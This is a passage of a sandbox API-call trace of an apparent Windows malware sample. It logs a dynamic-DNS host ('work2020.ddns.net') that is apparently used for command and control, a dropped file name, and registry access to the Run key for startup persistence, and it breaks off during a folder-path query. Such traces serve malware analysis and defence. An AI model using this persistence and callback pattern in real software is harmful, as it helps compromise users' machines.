HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e038 | out: hHeap=0x620000) returned 1 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x67e7f8 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a4) returned 0x67ea00 [0176.253] GetProcessHeap () returned 0x620000 [0176.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c00) returned 0x67efb0 [0176.254] GetProcessHeap () returned 0x620000 [0176.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a00) returned 0x6627f8 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x600) returned 0x64e038 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2e00) returned 0x650048 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x667200 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64f040 | out: hHeap=0x620000) returned 1 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65f9f0 | out: hHeap=0x620000) returned 1 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64da30 | out: hHeap=0x620000) returned 1 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65afe8 | out: hHeap=0x620000) returned 1 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x66cbf0 | out: hHeap=0x620000) returned 1 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x690bb8 [0176.255] GetProcessHeap () returned 0x620000 [0176.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67e7f8 | out: hHeap=0x620000) returned 1 [0176.264] lstrlenA (lpString=".bss") returned 4 [0176.264] lstrlenA (lpString=".bss") returned 4 [0176.264] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0176.265] lstrcpyA (in: lpString1=0x3f0000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0176.265] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.265] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.265] GetProcessHeap () returned 0x620000 [0176.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c00) returned 0x668208 [0176.266] lstrlenA (lpString=".text") returned 5 [0176.266] lstrlenA (lpString=".text") returned 5 [0176.266] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.266] lstrcpyA (in: lpString1=0x5e0000, lpString2=".text" | out: lpString1=".text") returned=".text" [0176.266] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0176.266] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.266] GetProcessHeap () returned 0x620000 [0176.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x668208 | out: hHeap=0x620000) returned 1 [0176.267] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.267] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.267] GetProcessHeap () returned 0x620000 [0176.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a00) returned 0x65afe8 [0176.267] lstrlenA (lpString=".rdata") returned 6 [0176.267] lstrlenA (lpString=".rdata") returned 6 [0176.267] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.267] lstrcpyA (in: lpString1=0x5e0000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0176.267] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0176.267] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.268] GetProcessHeap () returned 0x620000 [0176.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65afe8 | out: hHeap=0x620000) returned 1 [0176.269] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.269] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.269] GetProcessHeap () returned 0x620000 [0176.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x600) returned 0x64da30 [0176.269] lstrlenA (lpString=".data") returned 5 [0176.269] lstrlenA (lpString=".data") returned 5 [0176.269] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.270] lstrcpyA (in: lpString1=0x5e0000, lpString2=".data" | out: lpString1=".data") returned=".data" [0176.270] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0176.270] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.270] GetProcessHeap () returned 0x620000 [0176.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64da30 | out: hHeap=0x620000) returned 1 [0176.270] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.270] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.270] GetProcessHeap () returned 0x620000 [0176.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2e00) returned 0x65afe8 [0176.271] lstrlenA (lpString=".rsrc") returned 5 [0176.271] lstrlenA (lpString=".rsrc") returned 5 [0176.271] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.271] lstrcpyA (in: lpString1=0x5e0000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0176.271] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0176.271] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.271] GetProcessHeap () returned 0x620000 [0176.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65afe8 | out: hHeap=0x620000) returned 1 [0176.271] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.272] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.272] GetProcessHeap () returned 0x620000 [0176.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x64e640 [0176.272] lstrlenA (lpString=".reloc") returned 6 [0176.272] lstrlenA (lpString=".reloc") returned 6 [0176.272] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.272] lstrcpyA (in: lpString1=0x5e0000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0176.272] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0176.272] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.273] GetProcessHeap () returned 0x620000 [0176.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e640 | out: hHeap=0x620000) returned 1 [0176.273] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.273] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.273] GetProcessHeap () returned 0x620000 [0176.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x690dc0 [0176.273] lstrlenA (lpString=".bss") returned 4 [0176.273] lstrlenA (lpString=".bss") returned 4 [0176.273] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.273] lstrcpyA (in: lpString1=0x5e0000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0176.273] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0176.274] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.274] GetProcessHeap () returned 0x620000 [0176.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x690dc0 | out: hHeap=0x620000) returned 1 [0176.274] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0176.274] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0176.274] GetProcessHeap () returned 0x620000 [0176.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x690dc0 [0176.274] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.274] GetProcessHeap () returned 0x620000 [0176.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x64da30 [0176.274] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x64dc38 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64da30 | out: hHeap=0x620000) returned 1 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1ca) returned 0x64de40 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1ca) returned 0x64da30 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64de40 | out: hHeap=0x620000) returned 1 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1ca) returned 0x64de40 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x659de8 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x652e50 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x659de8 | out: hHeap=0x620000) returned 1 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x659de8 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x652e50 | out: hHeap=0x620000) returned 1 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x652e50 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1ca) returned 0x652e90 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1ca) returned 0x653068 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x652e90 | out: hHeap=0x620000) returned 1 [0176.275] GetProcessHeap () returned 0x620000 [0176.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x652e50 | out: hHeap=0x620000) returned 1 [0176.275] GetProcessHeap () returned 0x620000 [0176.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64de40 | out: hHeap=0x620000) returned 1 [0176.276] GetProcessHeap () returned 0x620000 [0176.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64da30 | out: hHeap=0x620000) returned 1 [0176.276] GetProcessHeap () returned 0x620000 [0176.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x63d368 [0176.276] lstrlenW (lpString="work2020.ddns.net") returned 17 [0176.276] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0176.276] lstrlenW (lpString="work2020.ddns.net") returned 17 [0176.276] lstrcpyW (in: lpString1=0x3f0000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0176.276] lstrlenW (lpString="work2020.ddns.net") returned 17 [0176.276] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.276] lstrcpyW (in: lpString1=0x5e0000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0176.276] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.277] lstrlenW (lpString="work2020.ddns.net") returned 17 [0176.277] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0176.277] lstrcpyW (in: lpString1=0x3f0000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0176.277] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.277] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.277] GetProcessHeap () returned 0x620000 [0176.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x6471e0 [0176.277] lstrlenW (lpString="images.exe") returned 10 [0176.277] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.278] lstrlenW (lpString="images.exe") returned 10 [0176.278] lstrcpyW (in: lpString1=0x5e0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0176.278] lstrlenW (lpString="images.exe") returned 10 [0176.278] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0176.278] lstrcpyW (in: lpString1=0x5f0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0176.278] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.278] lstrlenW (lpString="images.exe") returned 10 [0176.278] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0176.279] lstrcpyW (in: lpString1=0x5e0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0176.279] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.279] GetProcessHeap () returned 0x620000 [0176.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe) returned 0x6479f8 [0176.279] lstrlenW (lpString="Images") returned 6 [0176.279] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0176.279] lstrlenW (lpString="Images") returned 6 [0176.279] lstrcpyW (in: lpString1=0x5f0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0176.279] lstrlenW (lpString="Images") returned 6 [0176.279] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0176.279] lstrcpyW (in: lpString1=0x600000, lpString2="Images" | out: lpString1="Images") returned="Images" [0176.280] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.280] lstrlenW (lpString="Images") returned 6 [0176.280] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0176.280] lstrcpyW (in: lpString1=0x5f0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0176.280] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.281] GetProcessHeap () returned 0x620000 [0176.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16) returned 0x647200 [0176.281] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.281] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0176.281] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.281] lstrcpyW (in: lpString1=0x600000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0176.281] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.281] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0176.281] lstrcpyW (in: lpString1=0x610000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0176.281] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.282] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.282] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0176.282] lstrcpyW (in: lpString1=0x600000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0176.282] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.282] GetProcessHeap () returned 0x620000 [0176.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x653068 | out: hHeap=0x620000) returned 1 [0176.282] GetProcessHeap () returned 0x620000 [0176.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x690dc0 | out: hHeap=0x620000) returned 1 [0176.282] GetProcessHeap () returned 0x620000 [0176.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x690bb8 | out: hHeap=0x620000) returned 1 [0176.282] GetProcessHeap () returned 0x620000 [0176.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x667200 | out: hHeap=0x620000) returned 1 [0176.283] GetProcessHeap () returned 0x620000 [0176.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x650048 | out: hHeap=0x620000) returned 1 [0176.284] GetProcessHeap () returned 0x620000 [0176.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e038 | out: hHeap=0x620000) returned 1 [0176.284] GetProcessHeap () returned 0x620000 [0176.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6627f8 | out: hHeap=0x620000) returned 1 [0176.285] GetProcessHeap () returned 0x620000 [0176.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67efb0 | out: hHeap=0x620000) returned 1 [0176.285] GetProcessHeap () returned 0x620000 [0176.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64d628 | out: hHeap=0x620000) returned 1 [0176.285] ReleaseMutex (hMutex=0x1c0) returned 0 [0176.285] CloseHandle (hObject=0x1c0) returned 1 [0176.285] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0176.294] GetProcessHeap () returned 0x620000 [0176.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x64d628 [0176.294] lstrlenW (lpString="work2020.ddns.net") returned 17 [0176.294] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0176.295] lstrcpyW (in: lpString1=0x610000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0176.295] lstrlenW (lpString="images.exe") returned 10 [0176.295] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x12f0000 [0176.295] lstrcpyW (in: lpString1=0x12f0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0176.295] lstrlenW (lpString="Images") returned 6 [0176.295] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1300000 [0176.295] lstrcpyW (in: lpString1=0x1300000, lpString2="Images" | out: lpString1="Images") returned="Images" [0176.295] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.295] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1310000 [0176.296] lstrcpyW (in: lpString1=0x1310000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0176.296] GetProcessHeap () returned 0x620000 [0176.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x64d668 [0176.296] GetCurrentProcess () returned 0xffffffff [0176.296] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2af894 | out: TokenHandle=0x2af894*=0x1c0) returned 1 [0176.296] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x14, TokenInformation=0x2af88c, TokenInformationLength=0x4, ReturnLength=0x2af890 | out: TokenInformation=0x2af88c, ReturnLength=0x2af890) returned 1 [0176.296] CloseHandle (hObject=0x1c0) returned 1 [0176.296] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0176.297] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0176.297] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0176.297] lstrcpyW (in: lpString1=0x1320000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0176.297] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0176.297] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x1330000 [0176.297] lstrcpyW (in: lpString1=0x1330000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0176.297] VirtualFree (lpAddress=0x1320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.297] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.297] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0176.298] lstrcpyW (in: lpString1=0x1320000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0176.298] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.298] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0176.298] VirtualQuery (in: lpAddress=0x1330000, lpBuffer=0x2af84c, dwLength=0x1c | out: lpBuffer=0x2af84c*(BaseAddress=0x1330000, AllocationBase=0x1330000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.298] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x1340000 [0176.298] VirtualFree (lpAddress=0x1330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.298] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="ZO6KLPO6XJ" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ" [0176.298] VirtualFree (lpAddress=0x1320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.299] lstrlenW (lpString="inst") returned 4 [0176.299] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0176.299] lstrlenW (lpString="inst") returned 4 [0176.299] lstrcpyW (in: lpString1=0x1320000, lpString2="inst" | out: lpString1="inst") returned="inst" [0176.299] lstrlenW (lpString="inst") returned 4 [0176.299] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1330000 [0176.299] lstrcpyW (in: lpString1=0x1330000, lpString2="inst" | out: lpString1="inst") returned="inst" [0176.299] VirtualFree (lpAddress=0x1320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.300] lstrlenW (lpString="InitWindows") returned 11 [0176.300] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0176.300] lstrlenW (lpString="InitWindows") returned 11 [0176.300] lstrcpyW (in: lpString1=0x1320000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0176.300] lstrlenW (lpString="InitWindows") returned 11 [0176.300] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1350000 [0176.300] lstrcpyW (in: lpString1=0x1350000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0176.300] VirtualFree (lpAddress=0x1320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.301] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0176.301] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0176.301] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0176.301] lstrcpyW (in: lpString1=0x1320000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0176.301] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0176.301] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x1360000 [0176.301] lstrcpyW (in: lpString1=0x1360000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0176.301] VirtualFree (lpAddress=0x1320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.302] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2af950 | out: phkResult=0x2af950*=0x0) returned 0x2 [0176.311] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0176.311] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c0 [0176.312] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2afd1c | out: lpWSAData=0x2afd1c) returned 0 [0176.312] GetProcessHeap () returned 0x620000 [0176.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x32) returned 0x64d870 [0176.312] lstrlenW (lpString="work2020.ddns.net") returned 17 [0176.312] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x1370000 [0176.312] lstrcpyW (in: lpString1=0x1370000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0176.312] lstrlenW (lpString="images.exe") returned 10 [0176.312] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2c50000 [0176.312] lstrcpyW (in: lpString1=0x2c50000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0176.313] lstrlenW (lpString="Images") returned 6 [0176.313] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2c60000 [0176.313] lstrcpyW (in: lpString1=0x2c60000, lpString2="Images" | out: lpString1="Images") returned="Images" [0176.313] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0176.313] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2c70000 [0176.313] lstrcpyW (in: lpString1=0x2c70000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0176.313] GetProcessHeap () returned 0x620000 [0176.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x64d8b0 [0176.313] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2c80000 [0176.314] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2afad8 | out: pszPath="C:\\Users\\5p5NrGJn0jS 